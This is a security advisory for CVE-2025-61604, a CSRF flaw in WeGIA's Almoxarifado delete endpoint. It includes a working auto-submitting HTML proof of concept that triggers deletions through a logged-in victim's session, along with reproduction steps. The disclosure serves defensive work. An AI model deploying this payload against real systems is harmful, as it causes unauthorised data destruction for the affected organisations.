CVE-2025-61604: Cross-Site Request Forgery (CSRF) Vulnerability in AlmoxarifadoControle class Delete (GET) on control.php Endpoint

CVE Publication: https://www.cve.org/CVERecord?id=CVE-2025-61604

Summary

A Cross-Site Request Forgery (CSRF) vulnerability was identified in the WeGIA application. The delete operation for the Almoxarifado entity is exposed via HTTP GET without CSRF protection, allowing a third-party site to trigger the action using the victim’s authenticated session.

PoC

Vulnerable Endpoint: GET /WeGIA/controle/control.php

Parameters: metodo, nomeClasse e id_almoxarifado

Top-Level Navigation (works even with SameSite=Lax)

Host the file below from a different origin and open it while logged into WeGIA (ex: poc_csrf_get.html):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

<!doctype html>
<html>
  <body>
    <form id="f" method="GET" action="https://sec.wegia.org:8000/WeGIA/controle/control.php" target="_self">
      <input type="hidden" name="metodo" value="excluir">
      <input type="hidden" name="nomeClasse" value="AlmoxarifadoControle">
      <input type="hidden" name="id_almoxarifado" value="{choose a ID}">
    </form>
    <script>document.getElementById('f').submit();</script>
  </body>
</html>

Steps to Reproduce:

• Sign in to WeGIA with a user allowed to delete Almoxarifado.
• From another origin (e.g., http://127.0.0.1:8008), open the PoC HTML above.
• Observe WeGIA executing the delete flow (e.g., FK error or normal delete), proving a cross-site request can trigger the action.

Impact

• Integrity compromise: Attackers can induce privileged users to perform destructive actions by visiting an attacker-controlled page.
• Potential data loss or operational disruption if IDs not protected by FK constraints are targeted.

Reference

https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-59hm-4m9h-ch3m

Finder

Marcelo Queiroz

By: CVE-Hunters